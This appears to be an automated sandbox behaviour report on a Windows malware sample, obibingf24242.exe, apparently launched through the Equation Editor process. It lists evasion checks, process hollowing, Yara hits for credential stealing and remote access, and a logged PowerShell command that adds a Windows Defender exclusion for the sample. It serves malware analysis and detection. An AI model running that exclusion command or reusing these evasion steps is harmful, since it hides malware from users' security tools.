Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 200000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 2650000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: C10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 58A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 5550000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 68A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 78A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 1C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 2650000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: 4B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3894 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1409 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Window / User API: threadDelayed 9599 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Window / User API: foregroundWindowGot 614 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3580 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe TID: 3736 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3856 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe TID: 3972 Thread sleep time: -420000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe TID: 4036 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3120 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Memory written: C:\Users\user\AppData\Roaming\obibingf24242.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Process created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Queries volume information: C:\Users\user\AppData\Roaming\obibingf24242.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Queries volume information: C:\Users\user\AppData\Roaming\obibingf24242.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obibingf24242.exe PID: 3712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: obibingf24242.exe PID: 3804, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

barindex
Source: Yara match File source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obibingf24242.exe PID: 3712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: obibingf24242.exe PID: 3804, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs